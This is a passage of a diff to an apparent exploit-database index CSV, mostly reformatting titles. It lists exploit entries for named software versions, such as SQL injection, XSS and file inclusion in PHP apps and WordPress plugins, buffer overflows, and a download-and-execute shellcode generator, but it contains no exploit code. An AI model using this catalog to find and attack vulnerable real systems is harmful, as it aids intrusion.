Cross Site Scripting Vulnerability",2011-08-08,darkTR,php,webapps,0 +36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross Site Scripting Vulnerability",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange 'referer_id' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 -36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 -36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0 +36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 +36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi - Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0 -36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80 -36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0 +36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80 +36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability",2011-08-17,Ehsan_Hp200,php,webapps,0 36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Include Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x Security Bypass and Information Disclosure Vulnerabilities",2011-08-15,"Davide Canali",php,webapps,0 -36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0 -36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0 -36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0 +36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 -36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-02-11,"dogo h@ck",windows,local,0 +36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"Wordpress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection Vulnerability",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow",2015-02-11,metasploit,windows,remote,9256 @@ -32511,7 +32511,7 @@ id,file,description,date,author,platform,type,port 36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu 'category.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0 36065,platforms/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu 'main.asp' SQL Injection Vulnerability",2011-08-17,Inj3ct0r,asp,webapps,0 36066,platforms/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionaire SQL Injection Vulnerability",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 -36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion 'probe.cfm' Cross Site Scripting Vulnerability",2011-08-18,G.R0b1n,cfm,webapps,0 +36067,platforms/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross Site Scripting Vulnerability",2011-08-18,G.R0b1n,cfm,webapps,0 36068,platforms/php/webapps/36068.txt,"MantisBT <= 1.1.8 Cross Site Scripting and SQL Injection Vulnerabilities",2011-08-18,Net.Edit0r,php,webapps,0 36071,platforms/windows/dos/36071.py,"Xlight FTP Server 3.7 Remote Buffer Overflow Vulnerability",2011-08-19,KedAns-Dz,windows,dos,0 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 'onefilecms.php' Cross Site Scripting Vulnerability",2011-08-21,mr.pr0n,php,webapps,0 @@ -32525,7 +32525,7 @@ id,file,description,date,author,platform,type,port 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload Vulnerability",2011-08-25,KedAns-Dz,php,webapps,0 -36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0 +36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS",2015-02-16,"Kacper Szurek",php,webapps,0 @@ -32572,14 +32572,14 @@ id,file,description,date,author,platform,type,port 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection Vulnerability",2015-02-20,"K.d Long",xml,webapps,0 36411,platforms/windows/shellcode/36411.txt,"Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0 -36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 -36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0 -36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0 +36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 +36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0 +36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 -36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0 +36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0 36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 -36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0 +36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0 36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0 @@ -32602,38 +32602,38 @@ id,file,description,date,author,platform,type,port 36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF Vulnerability",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki <= 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki <= 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 -36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 +36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 -36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10_ WordPress 3.1.x_ DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0 +36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10_ WordPress 3.1.x_ DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB <= 1.3.6 'browse.php' Cross-Site Scripting Vulnerability",2011-09-26,Amir,php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Vulnerability",2011-09-26,"BHG Security Group",php,webapps,0 -36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 +36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection Vulnerability",2011-09-27,"kurdish hackers team",php,webapps,0 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0 36175,platforms/php/webapps/36175.txt,"Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-28,"High-Tech Bridge SA",php,webapps,0 36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 -36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 -36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 -36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 's' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 -36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 -36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 -36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 's' Parameter Cross Site Scripting Vulnerability",2011-09-24,jabdah,php,webapps,0 -36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 'index.php' Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 -36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 -36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 -36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 +36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 +36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 +36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 +36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 +36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 +36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-24,jabdah,php,webapps,0 +36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 - 'index.php' Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 +36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 +36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 - 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 +36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption PoC",2015-02-26,"Andras Kabai",linux,dos,0 -36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 +36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0 -36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 +36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 'more' Object HTML Injection Vulnerability",2011-09-30,"Paul Davis",php,webapps,0 -36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 -36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 'scheduleID' Parameter SQL Injection Vulnerability",2011-10-02,Rem0ve,php,webapps,0 +36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-24,SiteWatch,php,webapps,0 +36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection Vulnerability",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses admin.asp Security Bypass Vulnerability",2011-10-01,J.O,php,webapps,0 36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 POST/PUT Requests HTTP Header Processing Denial Of Service Vulnerability",2011-10-01,"Usman Saeed",multiple,dos,0 36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection Vulnerability",2011-10-02,anonymous,linux,remote,0 @@ -32651,7 +32651,7 @@ id,file,description,date,author,platform,type,port 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0 -36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0 +36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure Vulnerability",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Vulnerability",2011-10-09,"BHG Security Center",php,webapps,0 @@ -32666,20 +32666,20 @@ id,file,description,date,author,platform,type,port 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting Vulnerability",2011-10-02,"Stefan Schurtz",php,webapps,0 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 -36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0 +36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80 -36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 +36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36236,platforms/php/webapps/36236.txt,"Xenon 'id' Parameter Multiple SQL Injection Vulnerabilities",2011-10-14,m3rciL3Ss,php,webapps,0 36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 'index.php' Cross Site Scripting Vulnerability",2011-10-17,indoushka,php,webapps,0 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 -36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0 +36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0 36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -32696,7 +32696,7 @@ id,file,description,date,author,platform,type,port 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 -36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 +36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability",2011-10-28,"Marcel Bernhardt",windows,dos,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 @@ -32719,8 +32719,8 @@ id,file,description,date,author,platform,type,port 36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow Vulnerability",2011-11-08,anonymous,windows,dos,0 -36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 'file' Parameter Local File Disclosure Vulnerability",2011-11-04,"Todor Donev",hardware,remote,0 -36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 's' Parameter Cross Site Scripting Vulnerability",2011-11-04,3spi0n,php,webapps,0 +36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure Vulnerability",2011-11-04,"Todor Donev",hardware,remote,0 +36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross Site Scripting Vulnerability",2011-11-04,3spi0n,php,webapps,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0 @@ -32733,7 +32733,7 @@ id,file,description,date,author,platform,type,port 36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0 36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 -36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0 +36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80 @@ -32748,16 +32748,16 @@ id,file,description,date,author,platform,type,port 36314,platforms/php/webapps/36314.txt,"webERP <= 4.3.8 reportwriter/ReportMaker.php 